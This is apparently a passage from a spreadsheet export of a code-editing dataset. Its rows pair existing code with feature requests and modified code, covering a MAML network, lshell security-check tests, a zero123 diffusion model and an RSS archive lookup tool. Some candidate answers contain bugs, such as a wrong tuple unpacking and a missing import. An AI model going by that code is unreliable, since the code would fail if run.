(MetaModule, MetaSequential, MetaConv2d,\n                               MetaBatchNorm2d, MetaLinear)\n\n\ndef conv3x3(in_channels, out_channels, **kwargs):\n    return MetaSequential(\n        MetaConv2d(in_channels, out_channels, kernel_size=3, padding=1, **kwargs),\n        MetaBatchNorm2d(out_channels, momentum=1., track_running_stats=False),\n        nn.ReLU(),\n        nn.MaxPool2d(2)\n    )\n\nclass ConvolutionalNeuralNetwork(MetaModule):\n    def __init__(self, in_channels, out_features, hidden_size=64, dropout_rate=0.5):\n        #Modify: Added dropout_rate parameter\n        super(ConvolutionalNeuralNetwork, self).__init__()\n        self.in_channels = in_channels\n        self.out_features = out_features\n        self.hidden_size = hidden_size\n        self.dropout_rate = dropout_rate\n\n        self.features = MetaSequential(\n            conv3x3(in_channels, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size)\n        )\n\n        #New: Added dropout layer before classifier\n        self.dropout = nn.Dropout(p=dropout_rate)\n        self.classifier = MetaLinear(hidden_size, out_features)\n\n    def forward(self, inputs, params=None):\n        features = self.features(inputs, params=self.get_subdict(params, \'features\'))\n        features = features.view((features.size(0), -1))\n        #New: Apply dropout to features\n        features = self.dropout(features)\n        logits = self.classifier(features, params=self.get_subdict(params, \'classifier\'))\n        return logits\n\n\n#file 2 - train.py\nimport os\nimport torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport logging\n\nfrom torchmeta.datasets.helpers import omniglot\nfrom torchmeta.utils.data import BatchMetaDataLoader\nfrom torchmeta.utils.gradient_based import gradient_update_parameters\n\nfrom model import ConvolutionalNeuralNetwork\nfrom utils import get_accuracy\n\nlogger = logging.getLogger(__name__)\n\n\ndef train(args):\n    logger.warning(\'This script is an example to showcase the MetaModule and \'\n                   \'data-loading features of Torchmeta, and as such has been \'\n                   \'very lightly tested. For a better tested implementation of \'\n                   \'Model-Agnostic Meta-Learning (MAML) using Torchmeta with \'\n                   \'more features (including multi-step adaptation and \'\n                   \'different datasets), please check `https://github.com/\'\n                   \'tristandeleu/pytorch-maml`.\')\n\n    dataset = omniglot(args.folder,\n                       shots=args.num_shots,\n                       ways=args.num_ways,\n                       shuffle=True,\n                       test_shots=15,\n                       meta_train=True,\n                       download=args.download)\n    dataloader = BatchMetaDataLoader(dataset,\n                                     batch_size=args.batch_size,\n                                     shuffle=True,\n                                     num_workers=args.num_workers)\n\n    #Modify: Added dropout_rate parameter to model initialization\n    model = ConvolutionalNeuralNetwork(1,\n                                       args.num_ways,\n                                       hidden_size=args.hidden_size,\n                                       dropout_rate=args.dropout_rate)\n    model.to(device=args.device)\n    model.train()\n    meta_optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n    # Training loop\n    with tqdm(dataloader, total=args.num_batches) as pbar:\n        for batch_idx, batch in enumerate(pbar):\n            model.zero_grad()\n\n            train_inputs, train_targets = batch[\'train\']\n            train_inputs = train_inputs.to(device=args.device)\n            train_targets = train_targets.to(device=args.device)\n\n            test_inputs, test_targets = batch[\'test\']\n            test_inputs = test_inputs.to(device=args.device)\n            test_targets = test_targets.to(device=args.device)\n\n            outer_loss = torch.tensor(0., device=args.device)\n            accuracy = torch.tensor(0., device=args.device)\n            for task_idx, (train_input, train_target, test_input,\n                    test_target) in enumerate(zip(train_inputs, train_targets,\n                    test_inputs, test_targets)):\n                train_logit = model(train_input)\n                inner_loss = F.cross_entropy(train_logit, train_target)\n\n                model.zero_grad()\n                params = gradient_update_parameters(model,\n                                                    inner_loss,\n                                                    step_size=args.step_size,\n                                                    first_order=args.first_order)\n\n                test_logit = model(test_input, params=params)\n                outer_loss += F.cross_entropy(test_logit, test_target)\n\n                with torch.no_grad():\n                    accuracy += get_accuracy(test_logit, test_target)\n\n            outer_loss.div_(args.batch_size)\n            accuracy.div_(args.batch_size)\n\n            outer_loss.backward()\n            meta_optimizer.step()\n\n            pbar.set_postfix(accuracy=\'{0:.4f}\'.format(accuracy.item()))\n            if batch_idx &gt;= args.num_batches:\n                break\n\n    # Save model\n    if args.output_folder is not None:\n        filename = os.path.join(args.output_folder, \'maml_omniglot_\'\n            \'{0}shot_{1}way.th\'.format(args.num_shots, args.num_ways))\n        with open(filename, \'wb\') as f:\n            state_dict = model.state_dict()\n            torch.save(state_dict, f)\n\nif __name__ == \'__main__\':\n    import argparse\n\n    parser = argparse.ArgumentParser(\'Model-Agnostic Meta-Learning (MAML)\')\n\n    parser.add_argument(\'folder\', type=str,\n        help=\'Path to the folder the data is downloaded to.\')\n    parser.add_argument(\'--num-shots\', type=int, default=5,\n        help=\'Number of examples per class (k in "k-shot", default: 5).\')\n    parser.add_argument(\'--num-ways\', type=int, default=5,\n        help=\'Number of classes per task (N in "N-way", default: 5).\')\n\n    parser.add_argument(\'--first-order\', action=\'store_true\',\n        help=\'Use the first-order approximation of MAML.\')\n    parser.add_argument(\'--step-size\', type=float, default=0.4,\n        help=\'Step-size for the gradient step for adaptation (default: 0.4).\')\n    parser.add_argument(\'--hidden-size\', type=int, default=64,\n        help=\'Number of channels for each convolutional layer (default: 64).\')\n    #New: Added dropout-rate argument\n    parser.add_argument(\'--dropout-rate\', type=float, default=0.5,\n        help=\'Dropout rate for regularization (default: 0.5).\')\n\n    parser.add_argument(\'--output-folder\', type=str, default=None,\n        help=\'Path to the output folder for saving the model (optional).\')\n    parser.add_argument(\'--batch-size\', type=int, default=16,\n        help=\'Number of tasks in a mini-batch of tasks (default: 16).\')\n    parser.add_argument(\'--num-batches\', type=int, default=100,\n        help=\'Number of batches the model is trained over (default: 100).\')\n    parser.add_argument(\'--num-workers\', type=int, default=1,\n        help=\'Number of workers for data loading (default: 1).\')\n    parser.add_argument(\'--download\', action=\'store_true\',\n        help=\'Download the Omniglot dataset in the data folder.\')\n    parser.add_argument(\'--use-cuda\', action=\'store_true\',\n        help=\'Use CUDA if available.\')\n\n    args = parser.parse_args()\n    args.device = torch.device(\'cuda\' if args.use_cuda\n        and torch.cuda.is_available() else \'cpu\')\n\n    train(args)'}</t>
  </si>
  <si>
    <t>{'file1': "#Modify: Add dropout layer to the forward method\nclass ConvolutionalNeuralNetwork(MetaModule):\n    def __init__(self, in_channels, out_features, hidden_size=64, dropout_p=0.5):\n        super(ConvolutionalNeuralNetwork, self).__init__()\n        self.in_channels = in_channels\n        self.out_features = out_features\n        self.hidden_size = hidden_size\n        self.dropout_p = dropout_p\n\n        self.features = MetaSequential(\n            conv3x3(in_channels, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size),\n            conv3x3(hidden_size, hidden_size)\n        )\n\n        self.classifier = MetaLinear(hidden_size, out_features)\n\n    def forward(self, inputs, params=None):\n        features = self.features(inputs, params=self.get_subdict(params, 'features'))\n        features = features.view((features.size(0), -1))\n        features = F.dropout(features, p=self.dropout_p, training=self.training)  #Modify: Add dropout here\n        logits = self.classifier(features, params=self.get_subdict(params, 'classifier'))\n        return logits", 'file2': '#Modify: Update the model initialization to include dropout probability\nmodel = ConvolutionalNeuralNetwork(1,\n                                       args.num_ways,\n                                       hidden_size=args.hidden_size,\n                                       dropout_p=0.5)  #Modify: Add dropout_p parameter\nmodel.to(device=args.device)\nmodel.train()\nmeta_optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'The `variables.py` file defines configuration parameters and constants like `required_config`, `configparams`, `builtins_list`, and `FORBIDDEN_ENVIRON` that are used throughout the lshell system. These variables are imported and referenced in `test_unit.py` via `from lshell.variables import builtins_list` and indirectly through the `CheckConfig` and `sec` modules.', 'invoking_code_segment': 'In `test_unit.py`, the test methods invoke `sec.check_secure(INPUT, userconf)` multiple times (test_03 through test_28) to validate security checks. The function is called with input strings and user configuration dictionaries, expecting a tuple return value where the first element is a return code (0 or 1).', 'feature_description': 'Add support for custom error messages in the `check_secure` function. This feature allows the security check function to return detailed error messages along with the status code, enabling better user feedback and debugging. The modification extends the return value from a simple tuple with status code to include an optional custom error message parameter that can be configured in the variables and passed through the security checking pipeline.', 'modified_complete_code': '#file 1: lshell/lshell/variables.py\n\n#Modify - Add new configuration parameter for custom error messages\nconfigparams = [\'config=\',\n                \'help\',\n                \'version\',\n                \'quiet=\',\n                \'log=\',\n                \'logpath=\',\n                \'loglevel=\',\n                \'logfilename=\',\n                \'syslogname=\',\n                \'allowed=\',\n                \'forbidden=\',\n                \'sudo_commands=\',\n                \'warning_counter=\',\n                \'aliases=\',\n                \'intro=\',\n                \'prompt=\',\n                \'prompt_short=\',\n                \'timer=\',\n                \'path=\',\n                \'home_path=\',\n                \'env_path=\',\n                \'allowed_cmd_path=\',\n                \'env_vars=\',\n                \'scp=\',\n                \'scp_upload=\',\n                \'scp_download=\',\n                \'sftp=\',\n                \'overssh=\',\n                \'strict=\',\n                \'scpforce=\',\n                \'history_size=\',\n                \'history_file=\',\n                \'path_noexec=\',\n                \'allowed_shell_escape=\',\n                \'winscp=\',\n                \'disable_exit=\',\n                \'include_dir=\',\n                \'custom_error_messages=\']  #New\n\n#New - Add default custom error messages dictionary\nDEFAULT_ERROR_MESSAGES = {\n    \'forbidden_char\': \'Error: Forbidden character detected in command\',\n    \'forbidden_command\': \'Error: Command not allowed\',\n    \'forbidden_path\': \'Error: Path access denied\',\n    \'forbidden_pipe\': \'Error: Pipe operator not allowed\',\n    \'sudo_not_allowed\': \'Error: sudo command not permitted\'\n}\n\n#New - Add configuration for error message customization\nrequired_config = [\'allowed\', \'forbidden\', \'warning_counter\', \'custom_error_messages\']  #Modify\n\n---\n\n#file 2: lshell/test/test_unit.py\n\n#Modify - Update test methods to handle custom error messages\ndef test_03_checksecure_doublepipe(self):\n    """ U03 | double pipes should be allowed, even if pipe is forbidden """\n    args = self.args + ["--forbidden=[\'|\']", "--custom_error_messages={\'forbidden_pipe\': \'Double pipes are not allowed\'}"]  #Modify\n    userconf = CheckConfig(args).returnconf()\n    INPUT = "ls || ls"\n    result = sec.check_secure(INPUT, userconf)  #Modify\n    return self.assertEqual(result[0], 0)\n\ndef test_04_checksecure_forbiddenpipe(self):\n    """ U04 | forbid pipe, should return 1 """\n    args = self.args + ["--forbidden=[\'|\']", "--custom_error_messages={\'forbidden_pipe\': \'Pipe operator is forbidden\'}"]  #Modify\n    userconf = CheckConfig(args).returnconf()\n    INPUT = "ls | ls"\n    result = sec.check_secure(INPUT, userconf)  #Modify\n    self.assertEqual(result[0], 1)\n    if len(result) &gt; 1:  #New - Check for custom error message\n        self.assertIn(\'forbidden_pipe\', result[1] if isinstance(result[1], dict) else str(result[1]))  #New\n    return True  #New\n\ndef test_05_checksecure_forbiddenchar(self):\n    """ U05 | forbid character, should return 1 """\n    args = self.args + ["--forbidden=[\'l\']", "--custom_error_messages={\'forbidden_char\': \'Character l is not allowed\'}"]  #Modify\n    userconf = CheckConfig(args).returnconf()\n    INPUT = "ls"\n    result = sec.check_secure(INPUT, userconf)  #Modify\n    return self.assertEqual(result[0], 1)\n\n#New - Add test for custom error message retrieval\ndef test_29_custom_error_messages(self):\n    """ U29 | custom error messages should be returned with security check results """\n    args = self.args + ["--forbidden=[\'|\']", "--custom_error_messages={\'forbidden_pipe\': \'Custom pipe error\'}"]  #New\n    userconf = CheckConfig(args).returnconf()  #New\n    INPUT = "ls | ls"  #New\n    result = sec.check_secure(INPUT, userconf)  #New\n    self.assertEqual(result[0], 1)  #New\n    if len(result) &gt; 1 and isinstance(result[1], dict):  #New\n        self.assertEqual(result[1].get(\'error_type\'), \'forbidden_pipe\')  #New\n        self.assertEqual(result[1].get(\'message\'), \'Custom pipe error\')  #New\n    return True  #New'}</t>
  </si>
  <si>
    <t>{'#file 1 (lshell/sec.py)': '#Modify: Updated function signature to accept an optional error_message parameter\n\ndef check_secure(cmd, userconf, error_message=None):\n    # ... (existing code)\n    if error_condition:\n        return (1, error_message)  #Modify: Return custom error message if provided\n    return (0, None)', '#file 2 (test/test_unit.py)': "#Modify: Updated call to `check_secure` to include a custom error message\n\nfrom lshell import sec\n# ... (existing code)\nretcode, message = sec.check_secure(INPUT, userconf, error_message='Custom error message')[0]\n#New: Handle the returned error message\nif retcode:\n    print(message)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def extract_into_tensor(a, t, x_shape):\n    b, *_ = t.shape\n    out = a.gather(-1, t)\n    return out.reshape(b, *((1,) * (len(x_shape) - 1)))\n\ndef noise_like(shape, device, repeat=False):\n    repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(\n        shape[0], *((1,) * (len(shape) - 1))\n    )\n    noise = lambda: torch.randn(shape, device=device)\n    return repeat_noise() if repeat else noise()', 'invoking_code_segment': 'from extern.ldm_zero123.modules.diffusionmodules.util import (\n    extract_into_tensor,\n    make_beta_schedule,\n    noise_like,\n)\n\nclass LatentDiffusion(DDPM):\n    def __init__(self, ...):\n        ...\n        self.cc_projection = nn.Linear(772, 768)\n        ...\n    \n    def get_input(self, batch, k, return_first_stage_outputs=False, force_c_encode=False, cond_key=None, return_original_cond=False, bs=None, uncond=0.05):\n        ...\n        cond = {}\n        with torch.enable_grad():\n            clip_emb = self.get_learned_conditioning(xc).detach()\n            null_prompt = self.get_learned_conditioning([""])\n            cond["c_crossattn"] = [self.cc_projection(torch.cat([torch.where(prompt_mask, null_prompt, clip_emb), T[:, None, :]], dim=-1))]\n        cond["c_concat"] = [input_mask * self.encode_first_stage((xc.to(self.device))).mode().detach()]\n        ...', 'feature_description': 'Add a new feature to allow the model to handle multiple conditioning keys dynamically. This enables flexible conditioning with support for arbitrary conditioning key combinations, dynamic projection layer management, and improved conditioning composition.', 'modified_complete_code': '# File 1: extern/ldm_zero123/modules/diffusionmodules/util.py\n# #Modify - Add new function for dynamic conditioning key handling\ndef extract_into_tensor(a, t, x_shape):\n    b, *_ = t.shape\n    out = a.gather(-1, t)\n    return out.reshape(b, *((1,) * (len(x_shape) - 1)))\n\n\ndef noise_like(shape, device, repeat=False):\n    repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(\n        shape[0], *((1,) * (len(shape) - 1))\n    )\n    noise = lambda: torch.randn(shape, device=device)\n    return repeat_noise() if repeat else noise()\n\n\n# #New - Dynamic conditioning key handler\ndef process_conditioning_keys(cond_dict, conditioning_key_config):\n    """\n    Process and validate conditioning keys dynamically.\n    :param cond_dict: dictionary containing conditioning tensors\n    :param conditioning_key_config: dict with keys and their expected dimensions\n    :return: processed conditioning dictionary\n    """\n    processed_cond = {}\n    for key, config in conditioning_key_config.items():\n        if key in cond_dict:\n            cond_tensor = cond_dict[key]\n            if isinstance(cond_tensor, list):\n                cond_tensor = cond_tensor[0] if len(cond_tensor) &gt; 0 else None\n            if cond_tensor is not None:\n                processed_cond[key] = [cond_tensor] if not isinstance(cond_tensor, list) else cond_tensor\n    return processed_cond\n\n\n# #New - Dynamic projection layer factory\ndef create_projection_layer(input_dim, output_dim, layer_type=\'linear\'):\n    """\n    Create projection layers dynamically based on configuration.\n    :param input_dim: input dimension\n    :param output_dim: output dimension\n    :param layer_type: type of projection layer (\'linear\', \'conv1d\')\n    :return: projection layer module\n    """\n    if layer_type == \'linear\':\n        return nn.Linear(input_dim, output_dim)\n    elif layer_type == \'conv1d\':\n        return nn.Conv1d(input_dim, output_dim, kernel_size=1)\n    else:\n        raise ValueError(f"Unknown layer type: {layer_type}")\n\n\n# File 2: extern/ldm_zero123/models/diffusion/ddpm.py\n# #Modify - Update LatentDiffusion class to support dynamic conditioning keys\nclass LatentDiffusion(DDPM):\n    def __init__(\n        self,\n        first_stage_config,\n        cond_stage_config,\n        num_timesteps_cond=None,\n        cond_stage_key="image",\n        cond_stage_trainable=False,\n        concat_mode=True,\n        cond_stage_forward=None,\n        conditioning_key=None,\n        scale_factor=1.0,\n        scale_by_std=False,\n        unet_trainable=True,\n        # #New - Dynamic conditioning configuration\n        conditioning_key_config=None,\n        projection_layers_config=None,\n        *args,\n        **kwargs,\n    ):\n        self.num_timesteps_cond = default(num_timesteps_cond, 1)\n        self.scale_by_std = scale_by_std\n        assert self.num_timesteps_cond &lt;= kwargs["timesteps"]\n        if conditioning_key is None:\n            conditioning_key = "concat" if concat_mode else "crossattn"\n        if cond_stage_config == "__is_unconditional__":\n            conditioning_key = None\n        ckpt_path = kwargs.pop("ckpt_path", None)\n        ignore_keys = kwargs.pop("ignore_keys", [])\n        super().__init__(conditioning_key=conditioning_key, *args, **kwargs)\n        self.concat_mode = concat_mode\n        self.cond_stage_trainable = cond_stage_trainable\n        self.unet_trainable = unet_trainable\n        self.cond_stage_key = cond_stage_key\n        try:\n            self.num_downs = len(first_stage_config.params.ddconfig.ch_mult) - 1\n        except:\n            self.num_downs = 0\n        if not scale_by_std:\n            self.scale_factor = scale_factor\n        else:\n            self.register_buffer("scale_factor", torch.tensor(scale_factor))\n        self.instantiate_first_stage(first_stage_config)\n        self.instantiate_cond_stage(cond_stage_config)\n        self.cond_stage_forward = cond_stage_forward\n\n        # #Modify - Initialize dynamic conditioning key configuration\n        self.conditioning_key_config = conditioning_key_config or {\n            "c_crossattn": {"dim": 768},\n            "c_concat": {"dim": 4}\n        }\n        \n        # #New - Initialize projection layers dynamically\n        self.projection_layers = nn.ModuleDict()\n        if projection_layers_config is None:\n            projection_layers_config = {\n                "cc_projection": {"input_dim": 772, "output_dim": 768, "type": "linear"}\n            }\n        \n        for proj_name, proj_config in projection_layers_config.items():\n            self.projection_layers[proj_name] = create_projection_layer(\n                proj_config["input_dim"],\n                proj_config["output_dim"],\n                proj_config.get("type", "linear")\n            )\n        \n        # #Modify - Keep backward compatibility with cc_projection\n        if "cc_projection" in self.projection_layers:\n            self.cc_projection = self.projection_layers["cc_projection"]\n        else:\n            self.cc_projection = nn.Linear(772, 768)\n            self.projection_layers["cc_projection"] = self.cc_projection\n        \n        nn.init.eye_(list(self.cc_projection.parameters())[0][:768, :768])\n        nn.init.zeros_(list(self.cc_projection.parameters())[1])\n        self.cc_projection.requires_grad_(True)\n\n        self.clip_denoised = False\n        self.bbox_tokenizer = None\n\n        self.restarted_from_ckpt = False\n        if ckpt_path is not None:\n            self.init_from_ckpt(ckpt_path, ignore_keys)\n            self.restarted_from_ckpt = True\n\n    # #New - Method to dynamically process conditioning\n    def process_conditioning(self, cond_dict):\n        """\n        Process conditioning dictionary with dynamic key handling.\n        :param cond_dict: raw conditioning dictionary\n        :return: processed conditioning dictionary\n        """\n        processed = {}\n        for key, value in cond_dict.items():\n            if key in self.conditioning_key_config:\n                if isinstance(value, list):\n                    processed[key] = value\n                else:\n                    processed[key] = [value]\n        return processed\n\n    # #New - Method to apply projection layers dynamically\n    def apply_projection(self, tensor, projection_name):\n        """\n        Apply projection layer to tensor if it exists.\n        :param tensor: input tensor\n        :param projection_name: name of projection layer\n        :return: projected tensor or original tensor\n        """\n        if projection_name in self.projection_layers:\n            return self.projection_layers[projection_name](tensor)\n        return tensor\n\n    # #Modify - Update get_input to use dynamic conditioning\n    @torch.no_grad()\n    def get_input(\n        self,\n        batch,\n        k,\n        return_first_stage_outputs=False,\n        force_c_encode=False,\n        cond_key=None,\n        return_original_cond=False,\n        bs=None,\n        uncond=0.05,\n    ):\n        x = super().get_input(batch, k)\n        T = batch["T"].to(memory_format=torch.contiguous_format).float()\n\n        if bs is not None:\n            x = x[:bs]\n            T = T[:bs].to(self.device)\n\n        x = x.to(self.device)\n        encoder_posterior = self.encode_first_stage(x)\n        z = self.get_first_stage_encoding(encoder_posterior).detach()\n        cond_key = cond_key or self.cond_stage_key\n        xc = super().get_input(batch, cond_key).to(self.device)\n        if bs is not None:\n            xc = xc[:bs]\n        cond = {}\n\n        random = torch.rand(x.size(0), device=x.device)\n        prompt_mask = rearrange(random &lt; 2 * uncond, "n -&gt; n 1 1")\n        input_mask = 1 - rearrange(\n            (random &gt;= uncond).float() * (random &lt; 3 * uncond).float(), "n -&gt; n 1 1 1"\n        )\n        null_prompt = self.get_learned_conditioning([""])\n\n        with torch.enable_grad():\n            clip_emb = self.get_learned_conditioning(xc).detach()\n            null_prompt = self.get_learned_conditioning([""])\n            # #Modify - Use dynamic projection application\n            combined_cond = torch.cat(\n                [\n                    torch.where(prompt_mask, null_prompt, clip_emb),\n                    T[:, None, :],\n                ],\n                dim=-1,\n            )\n            cond["c_crossattn"] = [self.apply_projection(combined_cond, "cc_projection")]\n        \n        cond["c_concat"] = [\n            input_mask * self.encode_first_stage((xc.to(self.device))).mode().detach()\n        ]\n        \n        # #New - Process conditioning with dynamic key handling\n        cond = self.process_conditioning(cond)\n        \n        out = [z, cond]\n        if return_first_stage_outputs:\n            xrec = self.decode_first_stage(z)\n            out.extend([x, xrec])\n        if return_original_cond:\n            out.append(xc)\n        return out\n\n    # #Modify - Update configure_optimizers to include dynamic projection layers\n    def configure_optimizers(self):\n        lr = self.learning_rate\n        params = []\n        if self.unet_trainable == "attn":\n            print("Training only unet attention layers")\n            for n, m in self.model.named_modules():\n                if isinstance(m, CrossAttention) and n.endswith("attn2"):\n                    params.extend(m.parameters())\n        if self.unet_trainable == "conv_in":\n            print("Training only unet input conv layers")\n            params = list(self.model.diffusion_model.input_blocks[0][0].parameters())\n        elif self.unet_trainable is True or self.unet_trainable == "all":\n            print("Training the full unet")\n            params = list(self.model.parameters())\n        else:\n            raise ValueError(\n                f"Unrecognised setting for unet_trainable: {self.unet_trainable}"\n            )\n\n        if self.cond_stage_trainable:\n            print(f"{self.__class__.__name__}: Also optimizing conditioner params!")\n            params = params + list(self.cond_stage_model.parameters())\n        if self.learn_logvar:\n            print("Diffusion model optimizing logvar")\n            params.append(self.logvar)\n\n        # #Modify - Include all projection layers in optimizer\n        if self.projection_layers is not None:\n            params = params + list(self.projection_layers.parameters())\n            print("========== optimizing for dynamic projection layers ==========")\n\n        opt = torch.optim.AdamW(\n            [\n                {"params": self.model.parameters(), "lr": lr},\n                {"params": self.projection_layers.parameters(), "lr": 10.0 * lr},\n            ],\n            lr=lr,\n        )\n        if self.use_scheduler:\n            assert "target" in self.scheduler_config\n            scheduler = instantiate_from_config(self.scheduler_config)\n\n            print("Setting up LambdaLR scheduler...")\n            scheduler = [\n                {\n                    "scheduler": LambdaLR(opt, lr_lambda=scheduler.schedule),\n                    "interval": "step",\n                    "frequency": 1,\n                }\n            ]\n            return [opt], scheduler\n        return opt'}</t>
  </si>
  <si>
    <t>class DDPM(pl.LightningModule):
    def __init__(self, unet_config, timesteps=1000, beta_schedule='linear', loss_type='l2', ckpt_path=None, ignore_keys=[], load_only_unet=False, monitor='val/loss', use_ema=True, first_stage_key='image', image_size=256, channels=3, log_every_t=100, clip_denoised=True, linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3, given_betas=None, original_elbo_weight=0.0, v_posterior=0.0, l_simple_weight=1.0, conditioning_keys=None, parameterization='eps', scheduler_config=None, use_positional_encodings=False, learn_logvar=False, logvar_init=0.0, make_it_fit=False, ucg_training=None):
        super().__init__()
        assert parameterization in ['eps', 'x0'], 'currently only supporting "eps" and "x0"'
        self.parameterization = parameterization
        print(f"{self.__class__.__name__}: Running in {self.parameterization}-prediction mode")
        self.cond_stage_model = None
        self.clip_denoised = clip_denoised
        self.log_every_t = log_every_t
        self.first_stage_key = first_stage_key
        self.image_size = image_size  # try conv?
        self.channels = channels
        self.use_positional_encodings = use_positional_encodings
        self.model = DiffusionWrapper(unet_config, conditioning_keys)
        count_params(self.model, verbose=True)
        self.use_ema = use_ema
        if self.use_ema:
            self.model_ema = LitEma(self.model)
            print(f"Keeping EMAs of {len(list(self.model_ema.buffers()))}.")
        self.use_scheduler = scheduler_config is not None
        if self.use_scheduler:
            self.scheduler_config = scheduler_config
        self.v_posterior = v_posterior
        self.original_elbo_weight = original_elbo_weight
        self.l_simple_weight = l_simple_weight
        if monitor is not None:
            self.monitor = monitor
        self.make_it_fit = make_it_fit
        if ckpt_path is not None:
            self.init_from_ckpt(ckpt_path, ignore_keys=ignore_keys, only_model=load_only_unet)
        self.register_schedule(
            given_betas=given_betas,
            beta_schedule=beta_schedule,
            timesteps=timesteps,
            linear_start=linear_start,
            linear_end=linear_end,
            cosine_s=cosine_s,
        )
        self.loss_type = loss_type
        self.learn_logvar = learn_logvar
        self.logvar = torch.full(fill_value=logvar_init, size=(self.num_timesteps,))
        if self.learn_logvar:
            self.logvar = nn.Parameter(self.logvar, requires_grad=True)
        self.ucg_training = ucg_training or dict()
        if self.ucg_training:
            self.ucg_prng = np.random.RandomState()
#Modify: Changed `conditioning_key` to `conditioning_keys` to accept a list of keys.
class LatentDiffusion(DDPM):
    def __init__(self, first_stage_config, cond_stage_config, num_timesteps_cond=None, cond_stage_key='image', cond_stage_trainable=False, concat_mode=True, cond_stage_forward=None, conditioning_keys=None, scale_factor=1.0, scale_by_std=False, unet_trainable=True, *args, **kwargs):
        self.num_timesteps_cond = default(num_timesteps_cond, 1)
        self.scale_by_std = scale_by_std
        assert self.num_timesteps_cond &lt;= kwargs['timesteps']
        # for backwards compatibility after implementation of DiffusionWrapper
        if conditioning_keys is None:
            conditioning_keys = ['concat'] if concat_mode else ['crossattn']
        if cond_stage_config == '__is_unconditional__':
            conditioning_keys = None
        ckpt_path = kwargs.pop('ckpt_path', None)
        ignore_keys = kwargs.pop('ignore_keys', [])
        super().__init__(conditioning_keys=conditioning_keys, *args, **kwargs)
        self.concat_mode = concat_mode
        self.cond_stage_trainable = cond_stage_trainable
        self.unet_trainable = unet_trainable
        self.cond_stage_key = cond_stage_key
        try:
            self.num_downs = len(first_stage_config.params.ddconfig.ch_mult) - 1
        except:
            self.num_downs = 0
        if not scale_by_std:
            self.scale_factor = scale_factor
        else:
            self.register_buffer('scale_factor', torch.tensor(scale_factor))
        self.instantiate_first_stage(first_stage_config)
        self.instantiate_cond_stage(cond_stage_config)
        self.cond_stage_forward = cond_stage_forward
        # construct linear projection layer for concatenating image CLIP embedding and RT
        self.cc_projection = nn.Linear(772, 768)
        nn.init.eye_(list(self.cc_projection.parameters())[0][:768, :768])
        nn.init.zeros_(list(self.cc_projection.parameters())[1])
        self.cc_projection.requires_grad_(True)
        self.clip_denoised = False
        self.bbox_tokenizer = None
        self.restarted_from_ckpt = False
        if ckpt_path is not None:
            self.init_from_ckpt(ckpt_path, ignore_keys)
            self.restarted_from_ckpt = True
#Modify: Changed `conditioning_key` to `conditioning_keys` to pass a list of keys to `DDPM`.</t>
  </si>
  <si>
    <t>{'called_code_segment': "def load_item_entry(archive_directory, item_id):\n  item_body_path = base.paths.item_id_to_file_path(\n      os.path.join(archive_directory, 'items'), item_id)\n  if os.path.exists(item_body_path):\n    with open(item_body_path) as item_body_file:\n      try:\n        feed = base.atom.parse(item_body_file)\n      except ET.ParseError as e:\n        logging.warning('Could not parse file %s to load item entry %s',\n            item_body_path, item_id)\n        return None\n      for entry in feed.entries:\n        if entry.item_id == item_id:\n          return entry\n    logging.warning('Did not find item entry for %s', item_id)\n  else:\n    logging.warning('No item body file entry for %s', item_id)\n\n  return None", 'invoking_code_segment': "logging.info('Looking up bodies for items.')\n  for item_id in item_ids:\n    item_body_path = base.paths.item_id_to_file_path(\n        os.path.join(archive_directory, 'items'), item_id)\n    if os.path.exists(item_body_path):\n      with open(item_body_path) as item_body_file:\n        feed = base.atom.parse(item_body_file)\n        found_entry = False\n        for entry in feed.entries:\n          if entry.item_id == item_id:\n            logging.info('Body for item %s:', item_id)\n            logging.info('  %s', ET.tostring(entry.element))\n            found_entry = True\n            break\n        if not found_entry:\n          logging.warning('Did not find item body for %s', item_id)\n    else:\n      logging.warning('No item body file found for %s', item_id)", 'feature_description': 'Add a feature to log the content snippet of the item entry if the entry is found. This requires modifying the load_item_entry function in base.atom to return additional information about whether the entry was found, and updating the item_lookup.py to log the content snippet when displaying the item body.', 'modified_complete_code': "#file 1: readerisdead/base/atom.py\n\n#Modify - Updated load_item_entry function to log content snippet\ndef load_item_entry(archive_directory, item_id):\n  item_body_path = base.paths.item_id_to_file_path(\n      os.path.join(archive_directory, 'items'), item_id)\n  if os.path.exists(item_body_path):\n    with open(item_body_path) as item_body_file:\n      try:\n        feed = base.atom.parse(item_body_file)\n      except ET.ParseError as e:\n        logging.warning('Could not parse file %s to load item entry %s',\n            item_body_path, item_id)\n        return None\n      for entry in feed.entries:\n        if entry.item_id == item_id:\n          #New - Log the content snippet when entry is found\n          logging.info('Content snippet for item %s: %s', item_id, entry.content_snippet)\n          return entry\n    logging.warning('Did not find item entry for %s', item_id)\n  else:\n    logging.warning('No item body file entry for %s', item_id)\n\n  return None\n\n---\n\n#file 2: readerisdead/item_lookup/item_lookup.py\n\n#Modify - Updated the body lookup section to use load_item_entry and log content snippet\nlogging.info('Looking up bodies for items.')\n  for item_id in item_ids:\n    entry = base.atom.load_item_entry(archive_directory, item_id)\n    if entry:\n      logging.info('Body for item %s:', item_id)\n      logging.info('  %s', ET.tostring(entry.element))\n      #New - Log the content snippet\n      logging.info('  Content snippet: %s', entry.content_snippet)\n    else:\n      logging.warning('No item body file found for %s', item_id)"}</t>
  </si>
  <si>
